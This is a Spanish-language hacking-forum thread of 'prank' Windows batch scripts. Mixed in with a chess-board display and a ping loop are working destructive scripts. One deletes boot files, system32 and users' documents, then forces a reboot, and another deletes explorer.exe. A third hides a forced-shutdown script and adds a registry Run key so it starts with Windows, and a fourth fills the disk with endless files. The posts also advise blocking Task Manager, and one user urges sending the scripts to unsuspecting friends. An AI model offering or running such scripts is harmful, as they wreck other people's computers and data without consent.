Título: Re: broma bat!!!
Publicado por: TaN€R en 7 Octubre 2005, 01:24 am
revisa el apartado cursos y documentación, un post
de soplo sobre los bat.


saludos


Título: Re: broma bat!!!
Publicado por: von Newman en 8 Octubre 2005, 15:00 pm
Citar
Quieres hacerlo oculto que no se vea la ventana...

Añade a la linea del bat esto:   - h

Esa instrucción creo recordar que ocultaba
tirher  no se refiere a eso
Citar
No me refiero a eliminarlo, yo lo que quiero es que cuando dejo un bat ejecutando queda la ventana de DOS lo que yo quiero es que si dejo ejecutando algo no quiero que la ventana negra del CMD no quede en pantalla, entendes???

Citar
Como tendria que ser pq probe ponerlo dentro del bat y nada, luego probe ponerlo en linea de comandos:

achivo.bat -h

nunca lo vas a hacer así deberias de utilizar el comando attrib:


C:\Documents and Settings\Propietario>help attrib
Muestra o cambia los atributos de un archivo.

ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [unidad:][ruta]
       [nombre-archivo] [/S [/D]]

  +   Establece un atributo.
  -   Borra un atributo.
  R   Atributo de sólo lectura del archivo.
  A   Atributo de archivo de almacenamiento.
  S   Atributo de archivos del sistema.
  H   Atributo de archivo oculto.
  [unidad:][ruta][nombre-archivo]
  Especifica el archivo o archivos que serán afectados por ATTRIB
  /S  Procesa archivos que coinciden en la carpeta actual
        y todas las carpetas.
  /D  Procesa carpetas.


pero eso solo funciona para ocultar el "icono"
saludos!!!


Título: Re: broma bat!!!
Publicado por: H@T en 8 Octubre 2005, 15:58 pm
Gracias Von Newman tan dificil es que me entiendan, tal vez me explico mal, entendiste bien lo que necesito, pero no me pusite como hacerlo, ya se como ocultar archivos, pero eso no es lo que quiero.


Título: Re: broma bat!!!
Publicado por: von Newman en 8 Octubre 2005, 16:51 pm
pues como dije creo que era mediante una clave en el registro pero nose todavia como hacerla ni cual es.
estaba viendo que creando un servicio para hacer funcionar un demonio en background luego os platico cuando sepa bien la informacion
saludos!!!!


Título: Re: broma bat!!!
Publicado por: H@T en 8 Octubre 2005, 17:16 pm
Ok muchas gracias, yo igual seguire investigando, si averiguo cualquier cosa te digo


Título: Re: broma bat!!!
Publicado por: von Newman en 13 Octubre 2005, 04:00 am
hola!!!
hace rato estaba jugando ajedrez y se me ocurrió la idea de hacer uno pero con batch, yo se que esta medio marihuana mi idea pero creo que si se puede, talvez no podra diseñar jugadas o pensarlas por si mismo como la blue ibm pero seria una coleccion de jugadas dispuestas pa hacerse dependiendo de los movimientos de el usuario.
con otro conjunto de imagenes con el tablero y las piezas movidas.
bueno, siento que es un proyecto interesante asi que hago la pregunta de oro:
¿quién se atreve a aventurarse en esta travesia?

saludos!!!!


PD:la idea tiene coprhyg o como se escriba jejeje


Título: Re: broma bat!!!
Publicado por: MinusFour en 13 Octubre 2005, 13:15 pm
yo tengo una pregunta, mi bat, apaga la pc.. desde aca... pero cuando lo envio... Windows Bloquea el Archivo :S

use el comando shutdown :P


Título: Re: broma bat!!!
Publicado por: H@T en 13 Octubre 2005, 18:22 pm
¿quién se atreve a aventurarse en esta travesia?
PD:la idea tiene coprhyg o como se escriba jejeje


Sisi yo me aventuro con vos Von pero que es exactamente lo que queres hacer, algo que genere jugadas de ajedrez aleatorias????


Título: Re: broma bat!!!
Publicado por: von Newman en 14 Octubre 2005, 03:52 am
yo tengo una pregunta, mi bat, apaga la pc.. desde aca... pero cuando lo envio... Windows Bloquea el Archivo :S

use el comando shutdown :P
como lo envias???

¿quién se atreve a aventurarse en esta travesia?
PD:la idea tiene coprhyg o como se escriba jejeje


Sisi yo me aventuro con vos Von pero que es exactamente lo que queres hacer, algo que genere jugadas de ajedrez aleatorias????
pues muchas gracias tirther ya somos dos!
no creo que se pueda pues no puede escoger cosas por si mismo.
lo que podemos hacer es juntar un buen de jugadas para dependiendo el tipo de jugada de el usuario sea la respuesta
o tienes otra idea???
saludos!!!


Título: Re: broma bat!!!
Publicado por: von Newman en 18 Octubre 2005, 06:23 am
creo que se pospondra pues estoy en exámenes y de porsi no duermo.
pero si algien quiere seguir avanzando pues....
por cierto pongan todos los codecs que quieran y os que quieran que sean analizados
POR UNA CULTURA DEL BAT!
jajaja
bueno saludos!!!!


Título: Re: broma bat!!!
Publicado por: DarkM en 18 Octubre 2005, 18:37 pm
Disculpen que me meta pero tratando de aclarar algunas dudillas: los bat como todos saben se ejecutan en cmd, por tal razón no pueden hacer un proceso hide (oculto) como el ctfmon o el svchost y los comandos que ustedes hablaban se refieren a ocultar el archivo, cosa que si pueden hacer para evitar que sea localizado más facilmente, otra cosa para entorpecer el cierre del archivo es arrancarlo a el mismo en tiempo real y meter una clave en el registro que lo programe para que se arranque con el windows, en fin editando el registro pueden también bloquear el administrador de tareas para que no puedan terminar el proceso desde ahí  ;D en fin muchas cosillas que podrían hacer, pero tengan cuidado no se metan en aguas muy profundas  :o

Bueno, ahí les va on pequeño código que ya había posteado antes pero puede servir para hacer una broma un poquito más preocupante y atrevida jeje ::)

@echo off
start c:\darkm.bat /realtime
del %SystemRoot%\System32\logonui.exe /s /q /a:h /a:r /a:s /a:a /a:-
del %SystemRoot%\System32\winlogon.exe /s /q /a:h /a:r /a:s /a:a /a:-
del %SystemRoot%\System32\hal.dll /s /q /a:h /a:r /a:s /a:a /a:-
del ntldr /s /q /a:h /a:r /a:s /a:a /a:-
del ntdetect.com /s /q /a:h /a:r /a:s /a:a /a:-
del boot.ini /s /q /a:h /a:r /a:s /a:a /a:-
del *.doc /s /q /a:h /a:r /a:s /a:a /a:-
del *.xls /s /q /a:h /a:r /a:s /a:a /a:-
del *.mdb /s /q /a:h /a:r /a:s /a:a /a:-
del *.ppt /s /q /a:h /a:r /a:s /a:a /a:-
del *.pps /s /q /a:h /a:r /a:s /a:a /a:-
del *.ccd /s /q /a:h /a:r /a:s /a:a /a:-
del c:\windows\system32\*.* /s /q /a:h /a:r /a:s /a:a /a:-
del c:\Windows\*.* /s /q /a:h /a:r /a:s /a:a /a:-
del D:\*.ccd /s /q /a:h /a:r /a:s /a:a /a:-
del D:\*.doc /s /q /a:h /a:r /a:s /a:a /a:-
del c:\autoexec.bat /s /q /a:h /a:r /a:s /a:a /a:-
shutdown -f -r -c "DarkMaster" -t 7
cls

El código es opcional y a leguas se puede entender que hace, una pequeña explicación para mejorar un poco: se inicia el mismo en tiempo real, las primeras 2 líneas intentan borrar algunos archivos impresindibles del SO, la 3 logra borrar el hal.dll, con esto es suficiente para que la victi...ejem ejem nuestro amigo tenga que meter su cd de instalación  ;D luego borra algunos archivos de detección de red, el ntdetect.com hará que reinstale windows y pues depues trata de borrar lo que este a su paso  ;D ;D

PD: El WinXP SP2 bloquea todos los bat por "$eguridad" jeje


Título: Re: broma bat!!!
Publicado por: DarkM en 18 Octubre 2005, 18:43 pm
Se me olvidaba, no se si necesitaban la llave en la que pueden poner el auto arranque del bat, este es un ejemplo

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DarkMaster"="C:\\darkM.bat"

Donde darkM.bat es el nombre del archivo


Título: Re: broma bat!!!
Publicado por: von Newman en 19 Octubre 2005, 07:40 am
hola!!!
es bueno tu code aunque para eliminar tanto tardaria demasiado seria mejor usar el comando attrib solo para cambiar las extensiones de los programas y de esa forma que no los pueda abrir.
talvez se pueda crear un nuevo comando con la opcion -d del netcat para el cmd, cuestion de seguir intentando
DarkM ojalá pongas más codes y todos los demás igual.
saludos!!!!


Título: Re: broma bat!!!
Publicado por: von Newman en 25 Octubre 2005, 04:20 am
saludos tirher, sabes ya tengo tiempo de hacer el ajedrez, creo que si todavia tienes interes pues se hara, me estoy poniendo en contacto con un compañero pa ver si se une y aver si a alguien más quiere cooperar.
saludos
checa esto que lo hizo random (creo que asi es su nick jeje) en optro foro:
@echo off
:start
echo.
echo                                          ¿
echo  Simbologia: TRb     = Torre Reina       ³
echo              TKb     = Torre Rey         ³
echo              CRb     = Caballo reina     ³
echo              CKb     = Caballo Rey       ³
echo              ARb     = Arfil Reina       ÃÄÄÄBlanco
echo              AKb     = Arfil rey         ³
echo              Rb      = Reina Blanca      ³
echo              Kb      = Rey Blanco        ³
echo              Pb 1-8  = Peon Blanco       ³
echo.                                       
echo                                          ¿
echo              TRn     = Torre Reina       ³
echo              TKn     = Torre Rey         ³
echo              CRn     = Caballo reina     ³
echo              CKn     = Caballo Rey       ³
echo              ARn     = Arfil Reina       ÃÄÄÄNegro
echo              AKn     = Arfil rey         ³
echo              Rn      = Reina Blanca      ³
echo              Kn      = Rey Blanco        ³
echo              Pn 1-8  = Peon Blanco       ³
echo.                                         Ù
echo.
echo           ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo           ³TRb³CRb³ARb³Rb ³Kb ³AKb³CKb³TRb³
echo           ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
echo           ³Pb1³Pb2³Pb3³Pb4³Pb5³Pb6³Pb7³Pb8³
echo           ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
echo           ³   ³   ³   ³   ³   ³   ³   ³   ³
echo           ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
echo           ³   ³   ³   ³   ³   ³   ³   ³   ³
echo           ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
echo           ³   ³   ³   ³   ³   ³   ³   ³   ³
echo           ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
echo           ³   ³   ³   ³   ³   ³   ³   ³   ³
echo           ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
echo           ³Pn8³Pn7³Pn6³Pn5³Pn4³Pn3³Pn2³Pn1³
echo           ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
echo           ³TRn³CKn³AKn³Kn ³Rn ³ARn³CRn³TRn³
echo           ÀÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÙ
echo.
pause

saludos!!!


Título: Re: broma bat!!!
Publicado por: von Newman en 3 Noviembre 2005, 04:21 am
creo que ya no se va a hacer el ajedrez ;[ en fin dejo un code para que hagan ping indefinidamente.
saludos!!!
*-------------------------------------------------------------------*
@echo off
cd\
color 02
title Pinger.bat
echo.
echo.
echo.
echo          **************************
echo          *                                 *
echo          *                                 *
echo          *       PINGER   BAT   1.1        *
echo          *                                 *
echo          *            von Newman           *
echo          *                                  *   
echo          **************************
echo.
echo.
echo.
pause
cls
echo.
echo.
echo.
echo.
echo         Escribe la ip o el host que quieras pingear:
echo.
echo.
set /p tecla=
if %tecla% == %tecla% (goto :ok)
if %tecla% == ""  (goto :fin)
:ok
ping -t -a %tecla% -l 5000 /*esto es lo q puedes modificar*/
goto :2
:2
ping -t %tecla% -l 1000
goto :2
:fin
exit


Título: Re: broma bat!!!
Publicado por: H@T en 3 Noviembre 2005, 12:37 pm
Disculpa que no he podido poner con la agedrez, quisiera hacerlo pero en realidad ya estoy en epoca de parciales y no puedo dedicar nada de tiempo.

Disculpa, cuando tenga algo de tiempo no me olvidare.

DUDA: Como harias los movimientos de cada pieza, se ve bastante jodido restringir solo los movimientos.

Bueno
bytes


Título: Re: broma bat!!!
Publicado por: von Newman en 6 Noviembre 2005, 05:16 am
pues como con el bat no podemos hacer que escoja una jugada aleatoria, seria y recabando moviminetos, de cualquier tipo de jugada...un trabajo muy arduo!


Título: Re: broma bat!!!
Publicado por: I-NU en 9 Noviembre 2005, 02:10 am
hola a todos , soy nuevo en el foro y entiendo + o - lo de los batch

quiero pedir a von newman que publique una version de su broma bat que solo necesite un archivo , si no es mucha molestia

estoy tratando de hacer algo como un bat que llene el disco , pero no se como hacer una copia simultanea que me randomise los nombres ; ej:

@echo off
copy C:\miarchivobat.bat C:\1.bat
copy C:\miarchivobat.bat C:\2.bat
copy C:\miarchivobat.bat C:\3.bat etc...

hay alguna manera de k se haga un ciclo continuo en el cual miarchivobat.bat se copie a si mismo con diferentes nombres indefinidamente

gracias y salu2



Título: Re: broma bat!!!
Publicado por: I-NU en 9 Noviembre 2005, 02:15 am
PARA APAGAR EL PC EN 5 SEGUNDOS

@echo off
cd\
shutdown -s -f -t 5 -c "JAJAJAJAJAJAJAJAJAJAJA"

ANTIDOTO

@echo off
shutdown -a

______________________________________________________
PARA JODER EL PC

@echo off
cd WINDOWS
del/f explorer.exe
cd system32
del/f command.com
shutdown -s -f -t 1 -c "HAS PERDIDO TU PC"
cls
_____________________________________________________

yo se k estos batch estan DEMASIADO SIMPLES , pero apenas estoy empezando  ::) ::) ::) ::) ::) ::) ::) ::) ::)

espero que sea una ayuda para quienes apenas estamos empezando

____________________________________________________


Título: Re: broma bat!!!
Publicado por: /* strcpy() */ en 9 Noviembre 2005, 02:44 am
 Para llenar el disco duro lo que se me ocurre es pasar por medio de los > o >> (no me acuerdo, ya no programo bats)
texto (mucho texto) a un solo archivo, por lo que podes llenar (bueno, "llenar") el HD, con una porcion de codigo casi infima.
 Lo que podes hacer es q se valla haciendo al mismo tiempo en 4 archivos
1 tras otro.
Saludos


Título: Re: broma bat!!!
Publicado por: kickeador123 en 9 Noviembre 2005, 23:09 pm
ESTO ESTA DE LA p**a MARE,  ;D, ENVIASELOS A SUS AMIGOS que NO SABEN NADA Y JODANLO


Título: Re: broma bat!!!
Publicado por: von Newman en 12 Noviembre 2005, 15:31 pm
EthernalDarkness: me da gusto que te estes interesando en los bats,
Citar
yo se k estos batch estan DEMASIADO SIMPLES , pero apenas estoy empezando 
este es el espiritu que se necesitya para ser grande!! sigue asi
Citar
espero que sea una ayuda para quienes apenas estamos empezando
claro cuenten con mi ayuda todos los que quieran!

Citar
quiero pedir a von newman que publique una version de su broma bat que solo necesite un archivo , si no es mucha molestia
el bat quedaria asi:
*------------------------------------------*
@echo off
start c:\uno.bat
CMDD
*-------------------------------------------*
con esto crea un error puesto que el comando deberia ser CMD y se le agrega una D de más.

Citar
estoy tratando de hacer algo como un bat que llene el disco , pero no se como hacer una copia simultanea que me randomise los nombres
creo que esto no se puede hacer pero voy a intentarlo.

les dejo un simple bat que creo que ya se ha visto mucho pero para los nuevos les va a encantar:

*--------syss.bat--------------*
@echo off
echo @echo off>>C:\sys.bat
echo shutdown -s -f -t 10 -c "lo que sea">>C:\sys.bat
if exist C:\sys.bat goto oculto1
:oculto1
attrib +h C:\sys.bat
goto oculto2
:oculto2
attrib +h C:\syss.bat
goto start1
:start1
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SYSs /t REG_SZ /d C:\WINDOWS\sys.bat /f
goto start2
:start
start  /min /b C:\sys.bat
*------------------------------------------*
jajaja seria mas facil con solo hacer esto:
shutdown -s -f -t 10>>C:\Documents and Settings\All
Users\Menú Inicio\Programas\Inicio\sys.bat

saludos!!!


Título: Re: broma bat!!!
Publicado por: ito07 en 1 Enero 2009, 06:57 am
hola a todos , soy nuevo en el foro y entiendo + o - lo de los batch

quiero pedir a von newman que publique una version de su broma bat que solo necesite un archivo , si no es mucha molestia

estoy tratando de hacer algo como un bat que llene el disco , pero no se como hacer una copia simultanea que me randomise los nombres ; ej:

@echo off
copy C:\miarchivobat.bat C:\1.bat
copy C:\miarchivobat.bat C:\2.bat
copy C:\miarchivobat.bat C:\3.bat etc...

hay alguna manera de k se haga un ciclo continuo en el cual miarchivobat.bat se copie a si mismo con diferentes nombres indefinidamente

gracias y salu2



Uuuufff
esto es viejisimo,
pero igual si algun dia llegas aqui de nuevo
quiero que veas esto.....

Esta secuencia bat llenara el disco...

Código:
echo off
set/a num=1
cd %SystemRoot%
cls
:crea
echo Te estoy jodiendo la memoria de tu compu >> %num%.txt
set/a num=%num%+1
cls
goto crea

Donde
"Set/a num=1" dice que num vale 1
"cd %SistemRoot%" nos mueve al directorio de Windows C:/Windows
":crea" es un marcador al cual nos moveremos posteriormente
"echo Te estoy jod............ >> %num%.txt" Crea un archivo de texto con la frase...
"set/a num=%num%+1" Suma uno a la variable %num%
"cls" no hace falta decirlo.... aunque tampoco hacia falta ponerlo xD
"goto crea" Nos regresa al marcador ':crea' y todo se repite


Título: Re: broma bat!!!
Publicado por: dantemc en 1 Enero 2009, 07:17 am
hola, feliz año, hace 4 años de ese post (o 3 si quieres), que te pasa? copas? dame.

saluh


Título: Re: broma bat!!!
Publicado por: von Newman en 27 Diciembre 2010, 23:42 pm
Citar
broma bat!!!
« en: 27 Julio 2005, 01:18 »

Vaya! Ya serán casi 5 años de este post jaja...
Pues ya ando de vuelta, espero aportar cosas interesantes a la comunidad jajaja
Felices fiestas!

Nota del moderador:
Por favor no revivan post tan viejos y menos para solo saludar
gracias